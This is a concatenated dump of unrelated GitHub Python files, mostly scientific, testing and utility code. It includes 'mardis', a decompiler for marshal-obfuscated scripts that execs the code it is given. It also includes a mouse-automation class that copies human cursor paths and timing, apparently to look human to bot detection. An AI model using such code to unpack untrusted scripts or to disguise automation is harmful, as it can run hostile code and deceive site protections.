self.getSectionLabel(sectionIForces.idSection)\n label= self.limitStateLabel+sectionLabel\n # Update efficiency.\n if(CFtmp>elem.getProp(label).CF):\n elem.setProp(label,self.ControlVars(sectionLabel+'s',sectionIForces.idComb,CFtmp,sectionIForces.Vy))\n","repo_name":"xcfem/xc","sub_path":"python_modules/materials/awc_nds/AWCNDS_limit_state_checking.py","file_name":"AWCNDS_limit_state_checking.py","file_ext":"py","file_size_in_byte":45189,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"30374673674","text":"# Repo: https://github.com/kapten-kaizo/mardis\n# Author: @Kang_Ehem\n# Update at: 17 January 2022 23.17\nimport os\nimport sys\nimport re\nimport datetime\nimport types\nimport base64\ntry:\n import uncompyle6\nexcept Exception as i:\n exit(str(i))\nscript_name = 
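Both controllers above follow the same reduction: recompute a capacity factor per section and keep only the governing (largest) value per element. A library-independent sketch of that pattern, with plain dicts standing in for finite elements and illustrative numbers:

# Keep only the worst-case (largest) capacity factor per element, mirroring
# the updateEfficiency logic above; names here are illustrative only.
def updateWorstCase(results, elemTag, combName, CF):
    current= results.get(elemTag)
    if(current is None or CF>current['CF']):
        results[elemTag]= {'comb': combName, 'CF': CF}

results= {}
for tag, comb, cf in [(1, 'ULS1', 0.35), (1, 'ULS2', 0.91), (2, 'ULS1', 0.50)]:
    updateWorstCase(results, tag, comb, cf)
print(results)  # element 1 keeps the governing combination ULS2 (CF= 0.91)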
'mardis'\ncode_marshal = base64.b64decode('JXMKaW1wb3J0IHVuY29tcHlsZTYsIHN5cwpkZWYgZGVjb21waWxlKHZlcnNpb24sIGNvZGVfb2JqZWN0LCBpbyk6CiAgICB0cnk6CiAgICAgICAgdW5jb21weWxlNi5tYWluLmRlY29tcGlsZSh2ZXJzaW9uLCBjb2RlX29iamVjdCwgaW8pCiAgICBleGNlcHQ6IHByaW50KCJkZWNvbXBpbGUgZXJvcj8iKQppZiBoYXNhdHRyKHNzLCAiY29fY29kZSIpOgogICAgZGVjb21waWxlKDIuNywgc3MsIHN5cy5zdGRvdXQpCmVsc2U6IHByaW50KHNzKQ==')\nhave_code = base64.b64decode('IyBEZWNvbXBpbGUgYnkgTWFyZGlzIChUb29scyBCeSBLYXB0ZW4tS2Fpem8pCiMgVGltZSBTdWNjZXMgZGVjb21waWxlIDogJXMKJXMK')\ndef rmbg(file_name):\n r = open(file_name).read()\n console = [line for line in r.splitlines() if not line.startswith(\"#\")]\n timestap = str(datetime.datetime.now())\n result_code = have_code % (timestap, \"\\n\".join(console))\n with open(file_name, mode='w') as save_dis:\n save_dis.write(result_code)\n exit(\"decompiling done!. saved to `%s`\" % file_name)\ndef simpen_cok(file, string, message):\n with open(file,\"w\") as indihome:\n indihome.write(string)\n exit(message)\nfind_string_exec = lambda master_key: master_key.replace(\"\".join([\"exec\",re.findall(\"exec(.*)\",master_key)[0]]),\"\".join([\"ss=\",re.findall(\"exec(.*)\",master_key)[0]]))\ndef show_info(string):\n try:\n exec(string)\n except Exception as i:\n simpen_cok(sys.argv[1],save_code,\"Exception: %s\"%str(i))\n if type(ss) is types.CodeType:\n print(\"%s: %s\"%(dah_lah, str(ss)))\n else:print(\"%s: No Compile Module given !!\"%dah_lah)\ndef dis(nama_file, output_file, ekse_file):\n master_key = open(nama_file).read()\n line = len([master_key.splitlines()][0])\n if master_key.count(\"decompile eror?\")!=0:\n if os.path.exists(output_file):\n simpen_cok(output_file,save_code,\"%s: Decompile error!\" % script_name)\n else:exit(\"%s: Decompile failed!\" % script_name)\n globals()[\"save_code\"]=master_key\n if master_key.count(\"exec\")!=0:\n if len(re.findall(\"exec(.*)\",master_key)) > 1:\n simpen_cok(output_file,save_code,\"%s: Exec string is biggest!!\" % script_name)\n else:new_code = find_string_exec(master_key)\n show_info(new_code)\n open(ekse_file,\"w\").write(code_marshal%new_code)\n os.system(\"python2 %s > %s\" % (ekse_file, output_file))\n if os.path.exists(ekse_file):\n os.unlink(ekse_file)\n dis(output_file, output_file, ekse_file)\n else:\n if os.path.exists(output_file):\n rmbg(output_file)\n else:exit(\"%s: decompile failed!. 
not found `exec`\" % nama_file)\nclass Type:\n    def __init__(self,code):\n        self.message=str(code)\n        self.co_argcount = code.co_argcount\n        self.co_nlocals = code.co_nlocals\n        self.co_stacksize = code.co_stacksize\n        self.co_flags = code.co_flags\n        self.co_code = code.co_code\n        self.co_consts = code.co_consts\n        self.co_names = code.co_names\n        self.co_varnames = code.co_varnames\n        self.co_filename = code.co_filename\n        self.co_name = code.co_name\n        self.co_firstlineno = code.co_firstlineno\n        self.co_lnotab = code.co_lnotab\n        self.co_freevars = code.co_freevars\n        self.co_cellvars = code.co_cellvars\n    def myasm(co):\n        return types.CodeType(co.co_argcount,co.co_nlocals,co.co_stacksize,co.co_flags,co.co_code,co.co_consts,co.co_names,co.co_varnames,co.co_filename,co.co_name,co.co_firstlineno,co.co_lnotab,co.co_freevars,co.co_cellvars)\n    def __repr__(self):\n        return self.message\n    def __str__(self):\n        return self.message\ndef main():\n    if len(sys.argv) != 2:\n        exit(\"usage: mardis file_name.py\")\n    globals()['dah_lah']=sys.argv[1]\n    sys.argv=[dah_lah,\"code.py\",\".master_key\"]\n    print(\"If You Get Error Decompile, Error code saved to %s\"%sys.argv[1])\n    dis(*sys.argv)\nif __name__ == \"__main__\":\n    main()\n# Nyari Paan Lu Gan !!\",\"repo_name\":\"kapten-kaizo/mardis\",\"sub_path\":\"mardis.py\",\"file_name\":\"mardis.py\",\"file_ext\":\"py\",\"file_size_in_byte\":4100,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":39,\"dataset\":\"github-code\",\"pt\":\"31\"}\n{\"seq_id\":\"16651342859\",\"text\":\"import sys\nimport numpy as np\n\nfilename = sys.argv[1]\n\nwith open(filename, \"r\") as vasp :\n    # read vasp file\n    next(vasp); next(vasp)\n    lvs = list()\n    for i in range(3) :\n        for line in vasp :\n            lvs.append(line.split())\n            break\n    lvs = np.array(lvs).astype(float)\n    for line in vasp :\n        elems = line.split()\n        break\n    nelems = list()\n    for line in vasp :\n        for item in line.split() :\n            nelems.append(int(item))\n        break\n    elem_list = list()\n    for elem, nelem in zip(elems, nelems) :\n        elem_list += [elem] * nelem\n    next(vasp)\n    coords = list()\n    for line in vasp :\n        coords.append(line.split())\n    coords = np.array(coords).astype(float)\n    \n    # make xsf file\n    with open(filename[:-11] + \"xsf\", \"w\") as xsf :\n        xsf.write(\"CRYSTAL\\nPRIMVEC\\n\")\n        for row in lvs :\n            xsf.write(\"{: 14.9f} {: 13.9f} {: 13.9f}\\n\".format(row[0], row[1], row[2]))\n        xsf.write(\"PRIMCOORD\\n\" + str(coords.shape[0]) + \"\\n\")\n        for elem, coord in zip(elem_list, coords) :\n            xsf.write(\"{:2} {: 17.9f} {: 13.9f} {: 13.9f}\\n\".format(elem, coord[0], coord[1], coord[2]))\n\",\"repo_name\":\"rwexler/qetools\",\"sub_path\":\"structure/vasp2xsf.py\",\"file_name\":\"vasp2xsf.py\",\"file_ext\":\"py\",\"file_size_in_byte\":1185,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":0,\"dataset\":\"github-code\",\"pt\":\"31\"}\n{\"seq_id\":\"70791308889\",\"text\":\"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\n\npdiabetes = pd.read_csv('diabetes.csv', header=None)\nprint(pdiabetes[0:5])\n\nx=pdiabetes.iloc[1:,:8]\ny=pdiabetes.iloc[1:,8:].values.flatten()\nprint('x shape: ', x.shape, 'y shape: ', y.shape)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, random_state=0)\nstd_scl = StandardScaler()\nstd_scl.fit(x_train)\n\nx_train = std_scl.transform(x_train)\nx_test = std_scl.transform(x_test)\n\nsvc = SVC(kernel='rbf')\nsvc.fit(x_train, y_train)\n\nprint('Training data accuracy : ', svc.score(x_train, y_train))\nprint('Test data accuracy : ', svc.score(x_test, 
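A detail of the SVC snippet above worth noting: the scaler is fit on the training split only and its statistics are then reused on the test split, which avoids leaking test information. The same idea can be expressed as a pipeline; an equivalent sketch, not the original code:

from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

# A Pipeline fits the scaler on the training data only during fit(),
# then reuses those statistics when transforming the test data.
clf = make_pipeline(StandardScaler(), SVC(kernel='rbf'))
# clf.fit(x_train, y_train); clf.score(x_test, y_test)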
y_test))","repo_name":"YoungSeok-Choi/Machine-Running-practice","sub_path":"당뇨병 판정.py","file_name":"당뇨병 판정.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8987844727","text":"import unittest\n# from lib.HTMLTestRunner import HTMLTestRunner\nfrom lib.BeautifulReport.BeautifulReport import BeautifulReport\nimport os\nimport time\n\nif __name__ == '__main__':\n path = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'test_blog_case')\n suite = unittest.defaultTestLoader.discover(path, pattern='test*.py', top_level_dir=None)\n\n project_root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n report_dir = os.path.join(project_root, 'report')\n current_time = time.strftime(\"%Y-%m-%d_%H-%M-%S\")\n # report_abspath = os.path.join(report_dir, \"HTMLReport_{}.html\".format(current_time))\n # with open(report_abspath, 'wb') as f:\n # runner = HTMLTestRunner(stream=f,\n # title='自动化测试报告',\n # description='用例执行情况',\n # verbosity=2\n # )\n\n result = BeautifulReport(suite)\n result.report(filename=current_time +'自动化测试报告',\n description='用例执行情况',\n log_path=report_dir\n )\n # runner.run(suite)\n\n\n","repo_name":"hy546880109/auto_web_test","sub_path":"main/run_test_report.py","file_name":"run_test_report.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72464104087","text":"import eigen3 as e\nimport spacevecalg as sva\nimport rbdyn as rbd\n\n\ndef TutorialTree():\n \"\"\"\n Return the MultiBodyGraph, MultiBody and the zeroed MultiBodyConfig with the\n following tree structure:\n\n b4\n j3 | Spherical\n Root j0 | j1 j2 j4\n ---- b0 ---- b1 ---- b2 ----b3 ----b5\n Fixed RevX RevY RevZ PrismZ\n \"\"\"\n\n mbg = rbd.MultiBodyGraph()\n\n mass = 1.\n I = e.Matrix3d.Identity()\n h = e.Vector3d.Zero()\n\n rbi = sva.RBInertia(mass, h, I)\n\n b0 = rbd.Body(rbi, 0, \"b0\")\n b1 = rbd.Body(rbi, 1, \"b1\")\n b2 = rbd.Body(rbi, 2, \"b2\")\n b3 = rbd.Body(rbi, 3, \"b3\")\n b4 = rbd.Body(rbi, 4, \"b4\")\n b5 = rbd.Body(rbi, 5, \"b5\")\n\n mbg.addBody(b0)\n mbg.addBody(b1)\n mbg.addBody(b2)\n mbg.addBody(b3)\n mbg.addBody(b4)\n mbg.addBody(b5)\n\n j0 = rbd.Joint(rbd.Joint.Rev, e.Vector3d.UnitX(), True, 0, \"j0\")\n j1 = rbd.Joint(rbd.Joint.Rev, e.Vector3d.UnitY(), True, 1, \"j1\")\n j2 = rbd.Joint(rbd.Joint.Rev, e.Vector3d.UnitZ(), True, 2, \"j2\")\n j3 = rbd.Joint(rbd.Joint.Spherical, True, 3, \"j3\")\n j4 = rbd.Joint(rbd.Joint.Prism, e.Vector3d.UnitY(), True, 4, \"j4\")\n\n mbg.addJoint(j0)\n mbg.addJoint(j1)\n mbg.addJoint(j2)\n mbg.addJoint(j3)\n mbg.addJoint(j4)\n\n to = sva.PTransformd(e.Vector3d(0., 0.5, 0.))\n fro = sva.PTransformd.Identity()\n\n mbg.linkBodies(0, to, 1, fro, 0)\n mbg.linkBodies(1, to, 2, fro, 1)\n mbg.linkBodies(2, to, 3, fro, 2)\n mbg.linkBodies(1, sva.PTransformd(e.Vector3d(0.5, 0., 0.)),\n 4, fro, 3)\n mbg.linkBodies(3, to, 5, fro, 4)\n\n mb = mbg.makeMultiBody(0, True)\n mbc = rbd.MultiBodyConfig(mb)\n mbc.zero(mb)\n\n return mbg, mb, mbc\n","repo_name":"jrl-umi3218/sva_rbdyn_tutorials","sub_path":"robots/tutorial_tree.py","file_name":"tutorial_tree.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"31"} +{"seq_id":"20637855610","text":"\"\"\" Tests for josephus.py \"\"\"\n\nimport os\nimport re\nimport random\nfrom subprocess import 
getstatusoutput\n\nPRG = './josephus.py'\n\n\n# --------------------------------------------------\ndef test_exists():\n    \"\"\" Program exists \"\"\"\n\n    assert os.path.isfile(PRG)\n\n\n# --------------------------------------------------\ndef test_usage():\n    \"\"\" Prints usage \"\"\"\n\n    for flag in ['-h', '--help']:\n        rv, out = getstatusoutput(f'{PRG} {flag}')\n        assert rv == 0\n        assert re.match(\"usage\", out, re.IGNORECASE)\n\n\n# --------------------------------------------------\ndef test_bad_n():\n    \"\"\" Dies on bad N \"\"\"\n\n    bad = random.choice(range(-10, 1))\n    ok = random.choice(range(3, 10))\n    rv, out = getstatusoutput(f'{PRG} -n {bad} -k {ok}')\n    assert rv != 0\n    assert re.match(\"usage\", out, re.IGNORECASE)\n    assert re.search(f'-n \"{bad}\" must be > 0', out)\n\n\n# --------------------------------------------------\ndef test_bad_k():\n    \"\"\" Dies on bad K \"\"\"\n\n    bad = random.choice(range(-10, 1))\n    ok = random.choice(range(3, 10))\n    rv, out = getstatusoutput(f'{PRG} -k {bad} -n {ok}')\n    assert rv != 0\n    assert re.match(\"usage\", out, re.IGNORECASE)\n    assert re.search(f'-k \"{bad}\" must be > 0', out)\n\n\n# --------------------------------------------------\ndef test_defaults():\n    \"\"\" Runs OK with defaults \"\"\"\n\n    rv, out = getstatusoutput(f'{PRG}')\n    assert out == f'n = 10, k = 3, answer = 4'\n\n\n# --------------------------------------------------\ndef test_args1():\n    \"\"\" Runs OK with arguments \"\"\"\n\n    rv, out = getstatusoutput(f'{PRG} -n 64 -k 17')\n    assert out == f'n = 64, k = 17, answer = 13'\n\n\n# --------------------------------------------------\ndef test_args2():\n    \"\"\" Runs OK with arguments \"\"\"\n\n    rv, out = getstatusoutput(f'{PRG} -k 12 -n 67')\n    assert out == f'n = 67, k = 12, answer = 16'\n\",\"repo_name\":\"kyclark/josephus\",\"sub_path\":\"test.py\",\"file_name\":\"test.py\",\"file_ext\":\"py\",\"file_size_in_byte\":1846,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":0,\"dataset\":\"github-code\",\"pt\":\"31\"}\n{\"seq_id\":\"72944723609\",\"text\":\"# 53. Maximum Subarray\nnums = [-2,1,-3,4,-1,2,1,-5,4]\n# Output: 6\n\n#nums = [1]\n# Output: 1\n\n#nums = [-2,1]\n# Output: 1\n\n#nums = [-2,-1]\n# Output: -1\n\ncurSum = 0\nmaxSum = float('-inf')\n \nfor i in range(len(nums)):\n    if curSum < 0: curSum = 0\n    curSum += nums[i]\n    maxSum = max(curSum,maxSum)\n\nprint(maxSum)\",\"repo_name\":\"algohell/ALGOHELL\",\"sub_path\":\"53/pgo_53.py\",\"file_name\":\"pgo_53.py\",\"file_ext\":\"py\",\"file_size_in_byte\":307,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":4,\"dataset\":\"github-code\",\"pt\":\"31\"}\n{\"seq_id\":\"15724341869\",\"text\":\"import PyPDF2\nfrom PIL import Image, ExifTags\nimport io\nimport xml.etree.cElementTree as ET\nimport os\n# for printing the table\nfrom tabulate import tabulate\n# HTML Report\nfrom xml.dom.minidom import getDOMImplementation, Document\n# CSV Report\nimport csv\n\nclass PDFLC():\n    def __init__(self,filename,saveimages=False):\n        \"\"\"Instantiate a PDFLC (PDF licenses checker) object.\n\n        Args:\n            filename (str): The name of the PDF file or its path.\n            saveimages (bool, optional): If True the images of the PDF file will\n                be exported into a folder in the same directory as the file. 
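The maximum-subarray snippet above is Kadane's algorithm with a reset-before-add; the same logic in function form, with the example cases as checks (an independent sketch, not the original script):

def max_subarray(nums):
    # Kadane's algorithm: extend the running sum or restart at the current
    # element, and track the best sum seen so far.
    best = cur = nums[0]
    for x in nums[1:]:
        cur = max(x, cur + x)
        best = max(best, cur)
    return best

assert max_subarray([-2,1,-3,4,-1,2,1,-5,4]) == 6
assert max_subarray([1]) == 1
assert max_subarray([-2,-1]) == -1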
Defaults to False.\n\n        Returns:\n            Tuple: A list with all the metadata of the images and a dict with the metadata of the PDF.\n        \"\"\"\n        super().__init__()\n        self.filename = filename\n        self.PDFmetadata = None\n        self.imagesmetadata = None \n        self.foldername = filename.split(\".\")[0]\n        self.header = [\"pagenumber\", \"image.name\", \"width\", \"height\", \"xmp\",\n                       \"iptcrights\", \"creatorstxt\", \"exif\", \"exifrights\", \"exifartist\"]\n        self.saveimages = saveimages\n        self.imagesXMPXML = dict()\n        self.readPDF(filename=filename)\n\n\n    def readPDF(self,filename=None,saveimages=False):\n        \"\"\"Read the PDF and generate a list of the metadata.\n\n        Args:\n            filename (str): The path of the PDF file.\n\n        Returns:\n            list : a list of lists with the image metadata\n            meta : the PDF document metadata\n        \"\"\"\n        if filename is None:\n            if self.filename is None:\n                raise ValueError(\"Provide a valid filename.\")\n            filename = self.filename\n        # in case the images were not saved before\n        self.saveimages = True if saveimages else self.saveimages\n        if self.saveimages and not os.path.exists(self.foldername):\n            os.mkdir(self.foldername)\n        reader = PyPDF2.PdfReader(filename)\n        # read the metadata of the PDF file.\n        meta = reader.metadata\n        table = []\n        for pagenum, page in enumerate(reader.pages, 1):\n            try:\n                for image in page.images:\n                    imageID = \"-\".join(map(str, (pagenum, image.name)))\n                    xmp = False\n                    exif = False\n                    iptcrights = None\n                    exifrights = None\n                    creators_txt = None\n                    exifartist = None\n                    creators_joined = None\n                    # find the beginning and the end of the xpacket.\n                    begin = image.data.find(b\" self.y_website_bottom:\n            self.mouse_.scroll(0, -1)\n            self.y_website_top += 53\n            self.y_website_bottom += 53\n            time.sleep(random.uniform(0.0077, 0.1385))\n        element_y = element.rect['y']\n        \n        while element_y < self.y_website_top:\n            self.mouse_.scroll(0, 1)\n            self.y_website_top -= (53 if self.y_website_top > 0 else 0)\n            self.y_website_bottom -= (53 if self.y_website_bottom > self.y_website_bottom_lim else 0)\n            time.sleep(random.uniform(0.0077, 0.1385)) # Parameters are based on collected statistics of the user's scrolling.\n\n        point_on_element_x = element_x + random.randint(int(element.rect['width'] * 0.2), \n                                                        int(element.rect['width'] * 0.7))\n\n        point_on_element_y = self.y_screen_bottom - (self.y_website_bottom - element_y) + random.randint(int(element.rect['height'] * 0.2), int(element.rect['height'] * 0.8))\n\n        return point_on_element_x, point_on_element_y\n    \n\n    def bezier_path(self, x1, y1, x2, y2):\n        \"\"\"Returns the list of point coordinates used to build the mouse pointer path\n        to the target coordinate on the screen\n\n        :param x1: X coordinate of the current mouse pointer position\n        :param y1: Y coordinate of the current mouse pointer position\n        :param x2: X coordinate of the target point for the mouse pointer\n        :param y2: Y coordinate of the target point for the mouse pointer\n        :return: list of point coordinates\n        \"\"\"\n        \n        k = (y1 - y2) / (x1 - x2)\n        b = y2 - k * x2\n\n        x_delta = x2 - x1\n        y_delta = y2 - y1\n\n        up_down_direction = random.choice([-1, 1])\n\n        x_inter_1 = x1 + int(x_delta * random.randrange(-15, 40, 3)/100)\n        y_inter_1 = k * x_inter_1 + b + up_down_direction * int(y_delta * random.randrange(5, 25, 2) / 100)\n\n        if math.fabs(x_delta) > 100:\n            x_inter_2 = x1 + int(x_delta * random.randrange(80, 120, 3)/100)\n            y_inter_2 = k * x_inter_2 + b + up_down_direction * (-1) * int(y_delta * random.randrange(5, 25, 2) / 100)\n        else:\n            x_inter_2 = x2\n            y_inter_2 = y2\n\n        nodes1 = np.asfortranarray([\n            [x1, 
x_inter_1, x_inter_2 ,x2],\n            [y1, y_inter_1, y_inter_2, y2],])\n\n        curve1 = bezier.Curve(nodes1, degree=3)\n        s_vals = np.linspace(0., 1., math.fabs(int(x2 - x1))) \n        points = curve1.evaluate_multi(s_vals)\n        points = points.astype(int)\n\n        return points\n\n    def mouse_click_left(self):\n        \"\"\"Simulates a left mouse button click and returns nothing\n        \"\"\"\n\n        self.mouse_.press(Button.left)\n        time.sleep(random.uniform(0.0578, 0.1129)) # Values are based on collected statistics of the user's click speed\n        self.mouse_.release(Button.left)\n\n    def mouse_move_to(self, element):\n        \"\"\" Moves the mouse cursor from its current position on the screen to the target element on the page\n        :param element: WebElement onto which the mouse pointer must be moved\n        :return: None\n        \"\"\"\n        element_destination = self.in_focus(element)\n\n        # Build the path to the element as a sequence of points:\n        track_to_element = self.bezier_path(self.mouse_.position[0], \n                                            self.mouse_.position[1], \n                                            element_destination[0], \n                                            element_destination[1])\n        \n        speed_OX_1 = [(0.18, 0.22), (0.012, 0.017), (0.003, 0.005), (0.0030, 0.0070), (0.0035, 0.0055)]\n        speed_OX_2 = [(0.05, 0.19), (0.016, 0.030), (0.016, 0.047),\t(0.0108, 0.0211), (0.0044, 0.0082)]\n\n        distance_OX = math.fabs(element_destination[0] - self.mouse_.position[0])\n        distance_OY = math.fabs(element_destination[1] - self.mouse_.position[1])\n\n        if distance_OX >= distance_OY:\n            speed_choice = speed_OX_1\n        else:\n            speed_choice = speed_OX_2\n\n        if distance_OX <= 20:\n            point_interval = speed_choice[0]\n        elif 20 < distance_OX <= 50:\n            point_interval = speed_choice[1]\n        elif 50 < distance_OX <= 100:\n            point_interval = speed_choice[2]\n        elif 100 < distance_OX <= 300:\n            point_interval = speed_choice[3]\n        elif distance_OX > 300:\n            point_interval = speed_choice[4] \n\n        for i in range(len(track_to_element[0])):\n            self.mouse_.position = (track_to_element[0][i], track_to_element[1][i])\n            time.sleep(random.uniform(point_interval[0], point_interval[1]))\n        \n        time.sleep(0.4)\n\n    def mouse_scroll(self, direction):\n        \"\"\"Performs a single mouse wheel scroll in the given direction up/down\n\n        :param direction: set -1 to scroll down / set 1 to scroll up \n        :return: None\n        \"\"\"\n        self.mouse_.scroll(0, direction)\n        time.sleep(random.uniform(0.0077, 0.1385))\n\",\"repo_name\":\"menshikoff/VKR_MDA_2020\",\"sub_path\":\"regrid.py\",\"file_name\":\"regrid.py\",\"file_ext\":\"py\",\"file_size_in_byte\":8742,\"program_lang\":\"python\",\"lang\":\"ru\",\"doc_type\":\"code\",\"stars\":0,\"dataset\":\"github-code\",\"pt\":\"31\"}\n{\"seq_id\":\"69948612889\",\"text\":\"import time\nimport datetime\nimport logging\nfrom imcsdk.imcgenutils import *\nfrom imcsdk.imccoreutils import IMC_PLATFORM, get_server_dn\nfrom imcsdk.mometa.huu.HuuFirmwareUpdater import HuuFirmwareUpdater, \\\n    HuuFirmwareUpdaterConsts\nfrom imcsdk.mometa.huu.HuuFirmwareUpdateStatus import HuuFirmwareUpdateStatus\nfrom imcsdk.mometa.top.TopSystem import TopSystem\nfrom imcsdk.mometa.huu.HuuController import HuuController\n\nlog = logging.getLogger('imc')\n\ndef firmware_huu_update(handle, remote_share, share_type, remote_ip,\n                        username=\"\", password=\"\", update_component=\"all\",\n                        stop_on_error=\"yes\", timeout=240,\n                        verify_update=\"yes\", cimc_secure_boot=\"no\",\n                        server_id=1):\n    \"\"\"\n    This method can be used to upgrade the cimc firmware\n\n    Args:\n        handle (ImcHandle)\n        remote_share (string): Full path to the firmware file\n        share_type (string): \"nfs\", \"www\", \"cifs\"\n        remote_ip (string): IP address of the 
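bezier.Curve is used above to sample the cubic path; the same samples can be produced with plain NumPy via the Bernstein form of a cubic Bézier, which avoids the extra dependency. An equivalent sketch with illustrative control points:

import numpy as np

def cubic_bezier(p0, p1, p2, p3, n):
    # Bernstein form of a cubic Bezier curve:
    # B(t) = (1-t)^3 p0 + 3(1-t)^2 t p1 + 3(1-t) t^2 p2 + t^3 p3
    t = np.linspace(0.0, 1.0, n)[:, None]
    return ((1-t)**3)*p0 + 3*((1-t)**2)*t*p1 + 3*(1-t)*(t**2)*p2 + (t**3)*p3

pts = cubic_bezier(np.array([0., 0.]), np.array([40., 10.]),
                   np.array([80., -10.]), np.array([120., 0.]), n=120)
print(pts.astype(int)[:3])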
remote machine\n username (string): username\n password (string): password\n update_component (string): component to be updated.\n \"all\" for upgrading all components\n Refer release notes for individual component names\n stop_on_error (string): \"yes\", \"no\"\n timeout (int): Timeout value. Range is 30-240 mins.\n verify_update (string): \"yes\", \"no\"\n cimc_secure_boot (string): \"yes\", \"no\"\n server_id (int): Server id for which firmware is performed.\n This is relevant to C3260 platforms.\n\n Returns:\n HuuFirmwareUpdater object\n\n Examples:\n firmware_huu_update(handle=handle,\n remote_ip=ip,\n remote_share='nfsshare2/ucs-c460m4-huu-2.0.9l.iso',\n share_type='nfs',\n username=username,\n password=password,\n update_component='all',\n stop_on_error='yes',\n verify_update='no',\n cimc_secure_boot='no',\n timeout=60)\n \"\"\"\n\n top_system = TopSystem()\n if handle.platform == IMC_PLATFORM.TYPE_CLASSIC:\n parent_dn = top_system.dn\n elif handle.platform == IMC_PLATFORM.TYPE_MODULAR:\n parent_dn = get_server_dn(handle, str(server_id))\n\n huu = HuuController(parent_mo_or_dn=parent_dn)\n\n huu_firmware_updater = HuuFirmwareUpdater(\n parent_mo_or_dn=huu,\n remote_share=remote_share,\n map_type=share_type,\n remote_ip=remote_ip,\n username=username,\n password=password,\n update_component=update_component,\n admin_state=HuuFirmwareUpdaterConsts.ADMIN_STATE_TRIGGER,\n stop_on_error=stop_on_error,\n time_out=str(timeout),\n verify_update=verify_update,\n cimc_secure_boot=cimc_secure_boot)\n handle.add_mo(huu_firmware_updater)\n return huu_firmware_updater\n\n\ndef log_progress(msg=\"\", status=\"\"):\n log.info(\"%s: %s. %s\" % (datetime.datetime.now(), msg, status))\n\n\ndef _has_upgrade_started(update):\n return update.update_start_time == \"\" and update.update_end_time == \"\"\n\n\n# Tracks if upgrade is over, not necessarily successful\ndef _has_upgrade_finished(update):\n return update.update_end_time != \"NA\"\n\n\ndef _print_component_upgrade_summary(handle):\n update_objs = handle.query_classid(\"HuuUpdateComponentStatus\")\n log.info(\"Component Update Summary:-\")\n for obj in update_objs:\n log.info(\"%20s: %s\" % (obj.component, obj.update_status))\n\n\ndef firmware_huu_update_monitor(handle, timeout=60, interval=10, server_id=1):\n \"\"\"\n This method monitors status of a firmware upgrade.\n\n Args:\n handle(ImcHandle)\n timeout(int): Timeout in minutes for monitor API.\n interval(int): frequency of monitoring in seconds\n server_id(int): Server id for monitoring firmware upgrade\n\n Returns:\n None\n\n Examples:\n firmware_huu_update_monitor(handle, 60, 10)\n \"\"\"\n current_status = []\n start = datetime.datetime.now()\n\n top_system = TopSystem()\n if handle.platform == IMC_PLATFORM.TYPE_CLASSIC:\n parent_dn = top_system.dn\n elif handle.platform == IMC_PLATFORM.TYPE_MODULAR:\n parent_dn = get_server_dn(handle, str(server_id))\n\n huu = HuuController(parent_mo_or_dn=parent_dn)\n huu_firmware_updater = HuuFirmwareUpdater(parent_mo_or_dn=huu.dn)\n update_obj = HuuFirmwareUpdateStatus(\n parent_mo_or_dn=huu_firmware_updater.dn)\n\n while True:\n try:\n update_obj = handle.query_dn(update_obj.dn)\n if _has_upgrade_started(update_obj):\n log_progress(\"Firmware upgrade is yet to start\")\n\n if _has_upgrade_finished(update_obj):\n log_progress(\"Firmware upgrade has finished\",\n update_obj.overall_status)\n _print_component_upgrade_summary(handle)\n break\n elif update_obj.overall_status not in current_status:\n log_progress(\"Firmware Upgrade is still running\",\n 
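The monitor above combines fixed-interval polling with a wall-clock deadline; the skeleton of that pattern, stripped of the IMC specifics (illustrative only, not part of the SDK):

import time, datetime

def poll_until(check, interval=10, timeout_minutes=60):
    # Call check() every `interval` seconds until it returns True or the
    # wall-clock deadline passes, mirroring the monitor loop above.
    start = datetime.datetime.now()
    while not check():
        time.sleep(interval)
        if (datetime.datetime.now() - start).total_seconds() > timeout_minutes * 60:
            return False
    return True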
update_obj.overall_status)\n current_status.append(update_obj.overall_status)\n\n time.sleep(interval)\n secs = (datetime.datetime.now() - start).total_seconds()\n if int(secs / 60) > timeout:\n log_progress(\"Monitor API timeout\",\n \"rerun firmware_huu_update_monitor\")\n break\n except:\n _validate_connection(handle)\n\n\ndef _validate_connection(handle, timeout=15 * 60):\n \"\"\"\n Monitors IMC connection, if connection exists return True, else False\n Args:\n handle (ImcHandle)\n timeout (number): timeout in seconds\n Returns:\n True/False(bool)\n Raises:\n Exception if unable to connect to IMC\n \"\"\"\n\n connected = False\n start = datetime.datetime.now()\n while not connected:\n try:\n # If the session is already established,\n # this will validate the session\n connected = handle.login()\n except Exception as e:\n # IMC may been in the middle of activation,\n # hence connection would fail\n log.debug(\"Login to IMC failed: %s\", str(e))\n\n if not connected:\n try:\n log.debug(\"Login to IMC, elapsed time %ds\",\n (datetime.datetime.now() - start).total_seconds())\n handle.login(force=True)\n log.debug(\"Login successful\")\n connected = True\n except:\n log.debug(\"Login failed. Sleeping for 60 seconds\")\n time.sleep(60)\n if (datetime.datetime.now() - start).total_seconds() > timeout:\n raise Exception(\"TimeOut: Unable to login to IMC\")\n return connected\n","repo_name":"dumpofmemory/imc_handle","sub_path":"venv/lib/python2.7/site-packages/imcsdk/utils/imcfirmwareinstall.py","file_name":"imcfirmwareinstall.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20599509662","text":"from django.urls import path\nfrom .views import HomePageView, SearchResultsView, SearchContainer, SearchAlphabet, register_request, login_request, \\\n 